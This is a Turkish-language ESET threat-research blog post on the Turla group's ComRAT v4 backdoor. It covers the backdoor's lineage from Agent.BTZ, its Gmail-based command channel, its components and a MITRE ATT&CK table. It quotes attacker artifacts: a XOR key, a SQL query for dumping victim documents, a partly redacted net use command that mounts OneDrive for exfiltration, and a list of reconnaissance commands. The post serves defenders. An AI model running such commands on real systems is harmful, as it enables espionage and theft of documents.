Agent.BTZ'den ComRAT v4'e: On yıllık bir yolculuk

Sonraki hikaye
Matthieu Faou

ComRAT arka kapısını güncelleyen Turla şimdi Komuta ve Kontrol için Gmail web arayüzünü kullanıyor

ESET araştırmacıları, Turla grubu tarafından işletilen en eski kötü amaçlı yazılım ailelerinden biri olan ComRAT'ın yeni sürümünü buldu. Snake olarak da bilinen Turla, on yıldan uzun süredir aktif olanmeşhur bir casusluk grubudur. Daha önce bu blogda, grupla ilişkilendirilen birçok saldırı açıklamıştık.

Agent.BTZ olarak da bilinen ve geliştiricileri tarafından Chinch adıyla anılan ComRAT, 2008 yılında ABD ordusunun gizliliğini ihlal etmede kullanıldıktan sonra ün yapmış uzaktan erişim sağlayan bir truva atıdır (RAT). Bu kötü amaçlı yazılımın muhtemelen 2007'de piyasaya çıkarılan ilk sürümü, çıkarılabilir sürücüler aracılığıyla yayılarak solucan özellikleri taşıdığını gösterdi. 2007 ile 2012 yılları arasında RAT'ın iki yeni ana sürümü yayınlandı. İlginç bir şekilde, her ikisi de iyi bilinen Turla XOR anahtarını kullanıyordu:

1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s

2017'nin ortalarına kadar, Turla geliştiricileri ComRAT'ta birkaç değişiklik yaptı ancak görünüşe bakılırsa bu varyantlar aynı kod tabanından türetilmişti.

Daha sonra 2017'de ComRAT'ın çok farklı bir versiyonunun piyasaya sürüldüğünü fark ettik. Bu yeni sürüm yepyeni bir kod tabanı kullanıyordu ve öncekilerden çok daha karmaşıktı. Bu kötü amaçlı yazılım ailesinin temel özellikleri şunlardır:

  • ComRAT v4 ilk olarak 2017'de görüldü ve Ocak 2020'ye kadar hâlâ kullanılmakta olduğu biliniyor.
  • En az üç hedef tespit ettik: iki Dışişleri Bakanlığı ve bir ulusal parlamento.
  • ComRAT, hassas belgelerin çalınması için kullanıldı. Operatörler, verileri çalmak için OneDrive ve 4shared gibi genel bulut hizmetlerinden yararlandı.
  • ComRAT, C++ programlama dilinde geliştirilen karmaşık bir arka kapıdır.
  • ComRAT, FAT16 olarak biçimlendirilmiş bir Sanal FAT16 Dosya Sistemi kullanır.
  • ComRAT, PowerStallion PowerShell arka kapısı gibi mevcut erişim yöntemleri kullanılarak dağıtılır.
  • ComRAT'ın iki Komuta ve Kontrol kanalı vardır:
    • HTTP: ComRAT v3 ile tamamen aynı protokolü kullanır.
    • E-posta: Komutları almak ve verileri çalmak için Gmail web arayüzünü kullanır.
  • ComRAT, ele geçirilmiş bilgisayarlarda ek programlar yürütme veya dosya çalma gibi birçok eylem gerçekleştirebilir.

Turla ile ilişkilendirme

Viktimoloji ve TTP'lere baktığımızda, ComRAT'ın sadece Turla tarafından kullanıldığını düşünüyoruz. ComRAT v4'ü Turla'ya bağlayan birkaç unsur mevcuttur:

  • Önceki sürümlerle aynı dahili adı, yani Chinch'i kullanır.
  • HTTP üzerinden ComRAT v3 ile aynı özel Komuta ve Kontrol protokolünü kullanır.
  • Ağ altyapısının bir kısmı, başka bir Turla kötü amaçlı yazılım ailesi olan Mosquito ile paylaşılmaktadır.
  • Turla kötü amaçlı yazılım aileleri tarafından bırakıldı -veya başka Turla kötü amaçlı yazılım ailelerini bırakmıştı-:
    • Özelleştirilmiş bir PowerShell yükleyici
    • PowerStallion arka kapısı
    • RPC arka kapısı
     

Saldırganın etkinliğine ilişkin bilgiler

Araştırmamız sırasında, Turla operatörlerinin ele geçirilmiş makinelerde neler yaptıkları hakkında fikir edinebildik.

ComRAT'ın ana kullanım amacı gizli belgeleri çalmaktır. Bir keresinde, ComRAT operatörleri, kurbanın kuruluş belgelerini içeren merkezi MS SQL Server veritabanıyla etkileşim kurmak için bir .NET yürütülebilir dosyası bile dağıttı. Şekil 1, düzeltilmiş SQL komutunu göstermektedir.

sqlCommand.CommandText = "select top " + num2.ToString() + " filename, img, datalength(img), id from <Redacted> with(nolock) where not img is null and id>" + num4.ToString();
sqlCommand.CommandText += " and datalength(img)<1500000 and (filename like '%.doc' or filename like '%.docx' or filename like '[0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9]%.pdf' or (filename like '3%.pdf' and len(filename)>9))";
sqlCommand.CommandText += " order by id";

Şekil 1. Merkezi veritabanından (kısmen düzeltilmiş) belgelerin dökümünü almak için SQL komutu

Bu belgeler daha sonra sıkıştırıldı ve OneDrive veya 4shared gibi bir bulut depolama sağlayıcısına aktarıldı. Bulut depolama, Şekil 2'de gösterildiği gibi net use komutu kullanılarak bağlanır.

tracert -h 10 yahoo.com
net use docs.live.net/E65<redacted>; <redacted password> /u:<redacted>@aol.co.uk
tracert -h 10 yahoo.com

Şekil 2. Net use (redacted) kullanarak OneDrive klasörünü bağlama komutu

Operatörler, belge çalmanın yanı sıra Active Directory grupları veya kullanıcıları, ağ ya da grup ilkeleri gibi Microsoft Windows yapılandırmaları hakkında bilgi toplamak için birçok komut çalıştırır. Şekil 3'te Turla operatörleri tarafından yürütülen komutların bir listesi verilmiştir.

gpresult /z
gpresult /v
gpresult
net view
net view /domain
netstat
netstat -nab
netstat -nao
nslookup 127.0.0.1
ipconfig /all
arp -a
net share
net use
systeminfo
net user
net user administrator
net user /domain
net group
net group /domain
net localgroup
net localgroup
net localgroup Administrators
net group "Domain Computers" /domain
net group "Domain Admins" /domain
net group "Domain Controllers" /domain
dir "%programfiles%"
net group "Exchange Servers" /domain
net accounts
net accounts /domain
net view 127.0.0.1 /all
net session
route print
ipconfig /displaydns

Şekil 3. Ele geçirilmiş makinenin temel keşfi

Son olarak, Turla operatörlerinin güvenlik yazılımının farkında olduğunu ve bunlardan kaçınmaya çalıştıklarını da fark ettik. Örneğin kötü amaçlı yazılım örneklerinin algılanıp algılanmadığını anlamak için güvenlikle ilgili günlük dosyalarını düzenli olarak çalarlar. Bu, grubun gelişmişlik düzeyini ve aynı makinelerde uzun süre kalma niyetini gösterir.

Teknik analiz

Muhtemelen orijinal olan derleme zaman damgasına göre, bilinen ilk ComRAT v4 örneği Nisan 2017'de derlendi. Arka kapının son tekrarı, bildiğimiz kadarıyla Kasım 2019'da derlendi.

ESET telemetrisinden yola çıkarak, ComRAT'ın ele geçirilmiş kimlik bilgileri gibi mevcut bir dayanak noktası veya başka bir Turla arka kapısı kullanılarak kurulduğuna inanıyoruz. Örneğin ComRAT'ın 2019'da tanımladığımız PowerShell tabanlı arka kapısı olan PowerStallion tarafından kurulduğunu gördük.

ComRAT yükleyicisi, bir Windows zamanlanmış görevi oluşturan ve bir Kayıt Defteri değerini şifrelenmiş yük ile dolduran bir PowerShell komut dosyasıdır.

ComRAT v4'ün birkaç bileşeni vardır:

  • explorer.exe'ye eklenen bir düzenleyici: Arka kapı komutlarının yürütülmesi de dahil olmak üzere ComRAT işlevlerinin çoğunu kontrol eder.
  • Düzenleyici tarafından varsayılan tarayıcıya eklenen bir iletişim modülü (DLL): Adlandırılmış bir kanal kullanarak düzenleyici ile iletişim kurar.
  • Yapılandırma ve günlük dosyalarını içeren bir Sanal FAT16 Dosya Sistemi

Şekil 4, ComRAT’ın mimarisine genel bir bakış sağlar.

Şekil 4. ComRAT mimarisinin özeti

 

ComRAT v4'ün iki farklı Komuta ve Kontrol kanalı vardır: HTTP protokolünü (herkesin bildiği gibi) kullanan HTTP (sektörde eski olarak bilinir) ile Gmail web arayüzünü kullanan e-posta (sektörde posta olarak bilinir).

İkinci kanalda, yapılandırmada depolanan çerezleri kullanarak, gelen kutusunu kontrol etmek ve şifreli komutlar içeren belirli posta eklerini indirmek için Gmail web arayüzüne bağlanır. Bu komutlar, genellikle GMX gibi farklı bir ücretsiz e-posta sağlayıcısında barındırılan başka bir adresten kötü amaçlı yazılım operatörleri tarafından gönderilir.

Tüm ComRAT bileşenlerinin ayrıntılı teknik analizi teknik incelemedemevcuttur.

Sonuç

ComRAT v4, 2017 yılında piyasaya sürülen baştan aşağı yenilenmiş bir kötü amaçlı yazılım ailesidir. Geliştiricileri, çok karmaşık bir kötü amaçlı yazılım parçası oluşturmak için Snake gibi diğer Turla arka kapılarından ilham almıştır.

En ilginç özelliği, komutları almak ve verileri çalmak için Gmail web kullanıcı arayüzünü kullanmasıdır. Böylece, hiçbir kötü amaçlı etki alanına bağlı olmadığı için bazı güvenlik kontrollerini atlatabilir. Bu yeni sürümün, kötü amaçlı yazılıma ortak adını veren yöntem olan kalıcılık için COM nesnesini ele geçirmeyi bıraktığını da fark ettik.

2020'nin başında ComRAT v4'ün hâlâ kullanıldığını, Turla grubunun hâlâ çok aktif olduğunu, diplomatlar ve askerler için büyük bir tehdit oluşturduğunu gösteren belirtiler bulduk.

Teknik raporda ve GitHub'da Tehlike Göstergelerinin (IoC'ler) ve örneklerin yer aldığı kapsamlı listeyi bulabilirsiniz.

Arka kapının ayrıntılı analizi için teknik raporumuza başvurun. Sorularınızı yöneltmek ya da konuyla ilgili örnek göndermek için bizimle threatintel@eset.com adresinden iletişim kurabilirsiniz.

MITRE ATT&CK teknikleri

Taktik

Kimlik

Ad

Açıklama

Yürütme

T1086

PowerShell

ComRAT'i yüklemek için bir PowerShell komut dosyası kullanılır.

Kararlılık

T1053

Zamanlanmış Görev

ComRAT, PowerShell yükleyicisini başlatmak için zamanlanmış bir görev kullanır.

Savunmadan Kaçınma

T1027

Karartılmış Dosyalar veya Bilgiler

ComRAT düzenleyicisi şifrelenmiş şekilde saklanır ve yalnızca yürütme sırasında şifresi çözülür.

T1055

İşlem Yerleştirme

ComRAT düzenleyicisi explorer.exe'ye eklenir. İletişim DLL'si varsayılan tarayıcıya eklenir.

T1112

Kayıt Defterini Değiştirme

ComRAT düzenleyicisi, Kayıt Defteri'nde şifrelenmiş şekilde saklanır.

Keşfetme

T1016

Sistem Ağ Yapılandırması Keşfi

Operatörler ipconfig ve nbstat komutlarını yürütür.

T1033

Sistem Sahibi/Kullanıcı Bulma

Operatörler net user komutunu yürütür.

T1069

İzin Grupları Bulma

Operatörler net group /domain komutunu yürütür.

T1082

Sistem Bilgilerini Keşfetme

Operatörler systeminfo komutunu yürütür.

T1083

Dosya ve Dizin Bulma

Operatörler çeşitli dizinlerin içeriğini listeler. Örnek: dir /og-d "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*".

T1087

Hesap Bulma

Operatörler net user ve net group komutlarını yürütür.

T1120

Çevre Aygıtı Bulma

Operatörler, bağlı sürücüleri listelemek için fsutil fsinfo drives komutunu yürütür.

T1135

Ağ Paylaşımı Bulma

Operatörler net view komutunu yürütür.

Toplama

T1213

Bilgi Depolarından Veri Çalma

Operatörler, dahili bir merkezi veritabanından belgeleri çalmak için özel bir araç kullanır.

Komuta ve Kontrol

T1024

Özel Kriptografik Protokol

ComRAT, Komuta ve Kontrol verilerini şifrelemek için RSA ve AES kullanır.

T1043

Sık Kullanılan Bağlantı Noktası

ComRAT, 80 ve 443 bağlantı noktalarını kullanır.

T1071

Standart Uygulama Katmanı Protokolü

ComRAT, HTTP ve HTTPS kullanır.

T1102

Web Hizmeti

ComRAT, Gmail web kullanıcı arayüzü üzerinden kontrol edilebilir.

Çalma

T1002

Sıkıştırılmış Veriler

Belgeler bir RAR arşivinde sıkıştırılır.

T1022

Şifrelenmiş Veriler

RAR arşivi bir parola ile şifrelenir.

T1048

Alternatif Protokol Üzerinden Çalma

Veriler, net use komutu kullanılarak yerel olarak bağlanan bulut depolama alanına aktarılır.